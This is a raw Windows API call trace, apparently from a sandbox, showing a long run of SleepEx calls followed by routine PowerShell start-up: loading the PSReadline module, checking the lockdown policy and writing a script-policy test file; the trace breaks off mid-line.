SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0307.984] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0307.997] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0307.999] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.012] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.062] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.065] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.066] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.115] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.136] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.148] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.175] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.179] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.187] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.220] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.303] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.304] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.305] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.349] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.364] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.366] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.375] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.381] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.383] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.397] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.443] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.485] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.505] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.584] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.615] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.633] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.647] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.648] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.652] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.652] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.663] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.676] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.683] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.694] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.700] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.702] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.715] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.721] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.802] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.816] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.821] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.821] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.827] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.830] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.832] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.888] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.889] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0311.545] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0311.558] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0311.562] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0311.578] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0311.613] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0311.617] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0311.618] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0311.668] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0311.678] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0311.690] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0311.710] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0311.719] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0311.755] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0311.856] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0311.903] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0311.923] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0311.924] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0311.925] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0311.966] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0311.995] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0312.000] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0312.001] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0312.003] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0312.007] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0312.009] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0312.033] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0312.034] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0312.061] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0312.107] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0312.144] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0312.153] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0312.170] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0312.216] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0312.291] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0312.292] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0312.388] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0312.406] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0312.413] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0312.427] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0312.453] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0312.473] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0312.495] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0312.501] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0312.513] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0312.518] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0312.528] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0312.545] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0312.566] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0312.571] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0312.572] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0312.580] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 Thread: id = 73 os_tid = 0x5c8 [0244.899] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0244.920] RoInitialize () returned 0x1 [0244.920] RoUninitialize () returned 0x0 [0244.921] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x7c0ef5c*=0x6b4, lpdwindex=0x7c0ed7c | out: lpdwindex=0x7c0ed7c) returned 0x0 [0244.924] SetThreadUILanguage (LangId=0x0) returned 0x6e0409 [0245.261] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x7c0ee38*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x7c0ee38*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x6, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0245.261] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x7c0eda4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x7c0eda4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x0 [0245.261] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x7c0ee28*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x6, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x7c0ee28*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x6, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0245.414] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7c0e3f4, nSize=0x80 | out: lpBuffer="靖しက澪က澪") returned 0x0 [0245.414] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7c0e3f4, nSize=0x80 | out: lpBuffer="靖しက澪က澪") returned 0x0 [0245.435] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7c0e3e0, nSize=0x80 | out: lpBuffer="က澪က澪") returned 0x0 [0245.538] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x7c0ee38*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x7c0ee38*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x7, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0245.538] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x7c0eda4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x7c0eda4*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x6, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0245.538] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x7c0ee28*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x7, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x7c0ee28*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x7, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0245.542] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7c0e3b0, nSize=0x80 | out: lpBuffer="က澪က澪") returned 0x0 [0245.549] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x7c0ea90, nSize=0x80 | out: lpBuffer="") returned 0xc3 [0245.549] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x7c0ea08, nSize=0xc3 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Users\\FD1HVy\\Documents\\WindowsPowerShell\\Modules;C:\\Program Files (x86)\\WindowsPowerShell\\Modules;C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 0xc2 [0245.614] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules")) returned 0x10 [0245.668] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", nBufferLength=0x104, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", lpFilePart=0x0) returned 0x35 [0245.668] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x7c0ead8) returned 1 [0245.669] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline"), fInfoLevelId=0x0, lpFileInformation=0x7c0eb54 | out: lpFileInformation=0x7c0eb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x4631b23a, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x4631b23a, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0245.669] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x7c0ead4) returned 1 [0245.669] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x7c0eb58) returned 1 [0245.670] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x36 [0245.670] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", nBufferLength=0x36, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", lpFilePart=0x0) returned 0x35 [0245.672] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\*", lpFindFileData=0x7c0e880 | out: lpFindFileData=0x7c0e880*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x4631b23a, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x4631b23a, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x87f7f0 [0245.678] FindNextFileW (in: hFindFile=0x87f7f0, lpFindFileData=0x7c0e88c | out: lpFindFileData=0x7c0e88c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x4631b23a, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x4631b23a, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0245.678] FindNextFileW (in: hFindFile=0x87f7f0, lpFindFileData=0x7c0e88c | out: lpFindFileData=0x7c0e88c*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xb5477959, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xfff2ff0e, ftLastWriteTime.dwHighDateTime=0x1d1a04a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.1", cAlternateFileName="")) returned 1 [0245.681] FindNextFileW (in: hFindFile=0x87f7f0, lpFindFileData=0x7c0e88c | out: lpFindFileData=0x7c0e88c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb54d73e5, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b2558c7, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.2", cAlternateFileName="")) returned 1 [0245.681] FindNextFileW (in: hFindFile=0x87f7f0, lpFindFileData=0x7c0e88c | out: lpFindFileData=0x7c0e88c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0245.681] FindClose (in: hFindFile=0x87f7f0 | out: hFindFile=0x87f7f0) returned 1 [0245.681] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x7c0eb14) returned 1 [0245.682] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x7c0eb20) returned 1 [0245.733] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0245.733] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1", nBufferLength=0x4a, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1", lpFilePart=0x0) returned 0x49 [0245.733] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x7c0eaf4) returned 1 [0245.733] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.2\\psreadline.psd1"), fInfoLevelId=0x0, lpFileInformation=0x7c0eb70 | out: lpFileInformation=0x7c0eb70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a64f261, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5dec600, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5dec600, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2f6)) returned 1 [0245.733] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x7c0eaf0) returned 1 [0245.735] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0245.735] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1", nBufferLength=0x4a, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1", lpFilePart=0x0) returned 0x49 [0245.735] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x7c0ea28) returned 1 [0245.736] CreateFileW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.2\\psreadline.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x620 [0245.736] GetFileType (hFile=0x620) returned 0x1 [0245.736] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x7c0ea24) returned 1 [0245.736] GetFileType (hFile=0x620) returned 0x1 [0245.743] SetFilePointer (in: hFile=0x620, lDistanceToMove=0, lpDistanceToMoveHigh=0x7c0ea64*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x7c0ea64*=0) returned 0x0 [0245.743] ReadFile (in: hFile=0x620, lpBuffer=0x4b1bfb4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x7c0ea90, lpOverlapped=0x0 | out: lpBuffer=0x4b1bfb4*, lpNumberOfBytesRead=0x7c0ea90*=0x2f6, lpOverlapped=0x0) returned 1 [0245.744] SetFilePointer (in: hFile=0x620, lDistanceToMove=0, lpDistanceToMoveHigh=0x7c0ea64*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x7c0ea64*=0) returned 0x2f6 [0245.744] ReadFile (in: hFile=0x620, lpBuffer=0x4b1bfb4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x7c0ea90, lpOverlapped=0x0 | out: lpBuffer=0x4b1bfb4*, lpNumberOfBytesRead=0x7c0ea90*=0x0, lpOverlapped=0x0) returned 1 [0245.745] CloseHandle (hObject=0x620) returned 1 [0245.749] EtwEventRegister (in: ProviderId=0x4b1edd4, EnableCallback=0x4532d7e, CallbackContext=0x0, RegHandle=0x4b1edb0 | out: RegHandle=0x4b1edb0) returned 0x0 [0245.750] EtwEventSetInformation (RegHandle=0x8f9598, InformationClass=0x56, EventInformation=0x2, InformationLength=0x4b1ed88) returned 0x0 [0245.891] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.2\\psreadline.psd1")) returned 0x20 [0245.892] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.2\\psreadline.psd1")) returned 0x20 [0245.939] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0245.939] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1", nBufferLength=0x4a, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1", lpFilePart=0x0) returned 0x49 [0245.942] CoTaskMemAlloc (cb=0x20c) returned 0x6db3680 [0245.942] GetSystemDirectoryW (in: lpBuffer=0x6db3680, uSize=0x104 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0245.942] CoTaskMemFree (pv=0x6db3680) [0245.942] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\wldp.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1d [0245.942] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\wldp.dll", nBufferLength=0x1d, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0245.942] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x7c0e6d4) returned 1 [0245.942] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x7c0e750 | out: lpFileInformation=0x7c0e750*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fa1c22f, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6fa1c22f, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6fa1c22f, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xe840)) returned 1 [0245.942] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x7c0e6d0) returned 1 [0245.952] WldpGetLockdownPolicy () returned 0x10000000 [0245.953] CoTaskMemAlloc (cb=0x20c) returned 0x6db3680 [0245.953] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x6db3680 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0245.953] CoTaskMemFree (pv=0x6db3680) [0245.953] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x24 [0245.953] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", nBufferLength=0x24, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", lpFilePart=0x0) returned 0x23 [0245.954] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x24 [0245.954] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", nBufferLength=0x24, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", lpFilePart=0x0) returned 0x23 [0245.954] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x7c0e6c8) returned 1 [0245.954] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp"), fInfoLevelId=0x0, lpFileInformation=0x7c0e744 | out: lpFileInformation=0x7c0e744*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xc08929af, ftLastAccessTime.dwHighDateTime=0x1d608b7, ftLastWriteTime.dwLowDateTime=0xc08929af, ftLastWriteTime.dwHighDateTime=0x1d608b7, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1 [0245.954] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x7c0e6c4) returned 1 [0245.959] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_shgafj41.m2j.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x49 [0245.959] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_shgafj41.m2j.ps1", nBufferLength=0x49, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_shgafj41.m2j.ps1", lpFilePart=0x0) returned 0x48 [0245.959] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x7c0e610) returned 1 [0245.959] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_shgafj41.m2j.ps1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\__psscriptpolicytest_shgafj41.m2j.ps1"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x6f0 [0245.960] GetFileType (hFile=0x6f0) returned 0x1 [0245.960] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x7c0e60c) returned 1 [0245.960] GetFileType (hFile=0x6f0) returned 0x1 [0245.961] WriteFile (in: hFile=0x6f0, lpBuffer=0x4b2b958*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x7c0e68c, lpOverlapped=0x0 | out: lpBuffer=0x4b2b958*, lpNumberOfBytesWritten=0x7c0e68c*=0x1, lpOverlapped=0x0) returned 1 [0245.963] 